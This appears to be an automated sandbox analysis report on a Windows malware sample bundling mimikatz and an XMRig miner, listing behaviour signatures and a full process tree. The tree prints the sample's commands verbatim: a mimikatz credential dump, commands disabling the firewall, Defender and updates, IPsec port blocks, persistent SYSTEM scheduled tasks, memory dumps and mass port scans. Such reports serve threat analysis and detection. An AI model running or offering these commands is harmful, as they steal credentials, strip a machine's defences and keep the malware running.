Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-04-2024 05:48

General

  • Target

    2024-04-21_9e47cb1274249e50002191fc5b9e4361_hacktools_icedid_mimikatz.exe

  • Size

    7.8MB

  • MD5

    9e47cb1274249e50002191fc5b9e4361

  • SHA1

    fdb36ea0d3ef0f709984e1bf02646a31da851100

  • SHA256

    c0bb9c32285aa2389baec859677b00dbfdd65727d92a1ee9ced4af0616972c05

  • SHA512

    392682c314e140348c2751b0f93f215f44cb2b6818834fc0f7dd955fd0eee39351ad2362ab8e7f67542dff308f6f20a5010a5b8d2850b6025346550a71fdfd01

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (25839) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 32 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 9 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:332
      • C:\Windows\TEMP\mtuzratsi\buwabi.exe
        "C:\Windows\TEMP\mtuzratsi\buwabi.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:824
    • C:\Users\Admin\AppData\Local\Temp\2024-04-21_9e47cb1274249e50002191fc5b9e4361_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-21_9e47cb1274249e50002191fc5b9e4361_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fwinngti\vmqugny.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1296
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2536
        • C:\Windows\fwinngti\vmqugny.exe
          C:\Windows\fwinngti\vmqugny.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:296
    • C:\Windows\fwinngti\vmqugny.exe
      C:\Windows\fwinngti\vmqugny.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2868
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2720
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2864
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2572
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2676
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2476
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:1356
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                      PID:2516
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filteraction name=BastardsList action=block
                      2⤵
                      • Modifies data under HKEY_USERS
                      PID:1428
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\hmhcvyeye\ziairiyii\wpcap.exe /S
                      2⤵
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:3056
                      • C:\Windows\hmhcvyeye\ziairiyii\wpcap.exe
                        C:\Windows\hmhcvyeye\ziairiyii\wpcap.exe /S
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:2104
                        • C:\Windows\SysWOW64\net.exe
                          net stop "Boundary Meter"
                          4⤵
                            PID:1284
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop "Boundary Meter"
                              5⤵
                                PID:1536
                            • C:\Windows\SysWOW64\net.exe
                              net stop "TrueSight Meter"
                              4⤵
                                PID:1156
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:1444
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                    PID:2788
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop npf
                                      5⤵
                                        PID:2696
                                    • C:\Windows\SysWOW64\net.exe
                                      net start npf
                                      4⤵
                                        PID:1668
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 start npf
                                          5⤵
                                            PID:1072
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c net start npf
                                      2⤵
                                        PID:1700
                                        • C:\Windows\SysWOW64\net.exe
                                          net start npf
                                          3⤵
                                            PID:2436
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 start npf
                                              4⤵
                                                PID:2796
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start npf
                                            2⤵
                                              PID:1248
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                  PID:2892
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 start npf
                                                    4⤵
                                                      PID:1760
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\hmhcvyeye\ziairiyii\czntinysi.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\hmhcvyeye\ziairiyii\Scant.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:600
                                                  • C:\Windows\hmhcvyeye\ziairiyii\czntinysi.exe
                                                    C:\Windows\hmhcvyeye\ziairiyii\czntinysi.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\hmhcvyeye\ziairiyii\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:992
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\hmhcvyeye\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hmhcvyeye\Corporate\log.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  PID:1360
                                                  • C:\Windows\hmhcvyeye\Corporate\vfshost.exe
                                                    C:\Windows\hmhcvyeye\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2296
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bwinffcsi" /ru system /tr "cmd /c C:\Windows\ime\vmqugny.exe"
                                                  2⤵
                                                    PID:1628
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:2312
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "bwinffcsi" /ru system /tr "cmd /c C:\Windows\ime\vmqugny.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:2184
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ngiyzcyib" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F"
                                                      2⤵
                                                        PID:1044
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:1232
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "ngiyzcyib" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:1736
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "akievevef" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F"
                                                          2⤵
                                                            PID:840
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:612
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "akievevef" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:1976
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:1192
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:1696
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2920
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                    PID:2536
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                    2⤵
                                                                      PID:2740
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                      2⤵
                                                                        PID:2632
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                        2⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2596
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static set policy name=Bastards assign=y
                                                                        2⤵
                                                                          PID:2568
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                          2⤵
                                                                            PID:2520
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                            2⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:2816
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                            2⤵
                                                                              PID:2844
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static set policy name=Bastards assign=y
                                                                              2⤵
                                                                                PID:2280
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c net stop SharedAccess
                                                                                2⤵
                                                                                  PID:2344
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net stop SharedAccess
                                                                                    3⤵
                                                                                      PID:1284
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 stop SharedAccess
                                                                                        4⤵
                                                                                          PID:1860
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c netsh firewall set opmode mode=disable
                                                                                      2⤵
                                                                                        PID:1940
                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                          netsh firewall set opmode mode=disable
                                                                                          3⤵
                                                                                          • Modifies Windows Firewall
                                                                                          PID:1400
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c netsh Advfirewall set allprofiles state off
                                                                                        2⤵
                                                                                          PID:1156
                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                            netsh Advfirewall set allprofiles state off
                                                                                            3⤵
                                                                                            • Modifies Windows Firewall
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2556
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c net stop MpsSvc
                                                                                          2⤵
                                                                                            PID:2804
                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                              net stop MpsSvc
                                                                                              3⤵
                                                                                                PID:768
                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                  C:\Windows\system32\net1 stop MpsSvc
                                                                                                  4⤵
                                                                                                    PID:2892
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop WinDefend
                                                                                                2⤵
                                                                                                  PID:2784
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop WinDefend
                                                                                                    3⤵
                                                                                                      PID:2104
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop WinDefend
                                                                                                        4⤵
                                                                                                          PID:1760
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop wuauserv
                                                                                                      2⤵
                                                                                                        PID:1924
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop wuauserv
                                                                                                          3⤵
                                                                                                            PID:2764
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop wuauserv
                                                                                                              4⤵
                                                                                                                PID:2332
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c sc config MpsSvc start= disabled
                                                                                                            2⤵
                                                                                                              PID:1680
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc config MpsSvc start= disabled
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2268
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c sc config SharedAccess start= disabled
                                                                                                              2⤵
                                                                                                                PID:1724
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc config SharedAccess start= disabled
                                                                                                                  3⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2644
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c sc config WinDefend start= disabled
                                                                                                                2⤵
                                                                                                                  PID:1072
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc config WinDefend start= disabled
                                                                                                                    3⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1700
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config wuauserv start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:1800
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config wuauserv start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1248
                                                                                                                  • C:\Windows\TEMP\xohudmc.exe
                                                                                                                    C:\Windows\TEMP\xohudmc.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:1752
                                                                                                                  • C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe
                                                                                                                    C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe -accepteula -mp 332 C:\Windows\TEMP\hmhcvyeye\332.dmp
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1872
                                                                                                                  • C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe
                                                                                                                    C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe -accepteula -mp 1120 C:\Windows\TEMP\hmhcvyeye\1120.dmp
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3048
                                                                                                                  • C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe
                                                                                                                    C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe -accepteula -mp 1172 C:\Windows\TEMP\hmhcvyeye\1172.dmp
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2372
                                                                                                                  • C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe
                                                                                                                    C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe -accepteula -mp 1808 C:\Windows\TEMP\hmhcvyeye\1808.dmp
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1708
                                                                                                                  • C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe
                                                                                                                    C:\Windows\TEMP\hmhcvyeye\svzwiqyni.exe -accepteula -mp 2284 C:\Windows\TEMP\hmhcvyeye\2284.dmp
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2920
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd.exe /c C:\Windows\hmhcvyeye\ziairiyii\scan.bat
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:2060
                                                                                                                    • C:\Windows\hmhcvyeye\ziairiyii\ftmsihvqn.exe
                                                                                                                      ftmsihvqn.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in Windows directory
                                                                                                                      PID:384
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                    2⤵
                                                                                                                      PID:3616
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                        3⤵
                                                                                                                          PID:1688
                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                          3⤵
                                                                                                                            PID:3968
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                            3⤵
                                                                                                                              PID:2896
                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                              3⤵
                                                                                                                                PID:3620
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:3392
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                  3⤵
                                                                                                                                    PID:1916
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2580
                                                                                                                              • C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                                C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:1496
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2608
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:2176
                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                    taskeng.exe {4426E07B-1F96-473C-A142-9AA80A2836D8} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                    1⤵
                                                                                                                                      PID:2076
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:2848
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:1592
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:1932
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:2844
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1860
                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                    cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2168
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vmqugny.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2824
                                                                                                                                                      • C:\Windows\ime\vmqugny.exe
                                                                                                                                                        C:\Windows\ime\vmqugny.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:1540
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3640
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3320
                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                            cacls C:\Windows\TEMP\mtuzratsi\buwabi.exe /p everyone:F
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2812
                                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vmqugny.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3768
                                                                                                                                                              • C:\Windows\ime\vmqugny.exe
                                                                                                                                                                C:\Windows\ime\vmqugny.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:4088
                                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3700
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3376
                                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                                    cacls C:\Windows\fwinngti\vmqugny.exe /p everyone:F
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1728
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3344

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                  Execution

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Persistence

                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                  1
                                                                                                                                                                  T1543

                                                                                                                                                                  Windows Service

                                                                                                                                                                  1
                                                                                                                                                                  T1543.003

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                  1
                                                                                                                                                                  T1543

                                                                                                                                                                  Windows Service

                                                                                                                                                                  1
                                                                                                                                                                  T1543.003

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Defense Evasion

                                                                                                                                                                  Impair Defenses

                                                                                                                                                                  1
                                                                                                                                                                  T1562

                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                  1
                                                                                                                                                                  T1562.004

                                                                                                                                                                  Modify Registry

                                                                                                                                                                  2
                                                                                                                                                                  T1112

                                                                                                                                                                  Subvert Trust Controls

                                                                                                                                                                  1
                                                                                                                                                                  T1553

                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                  1
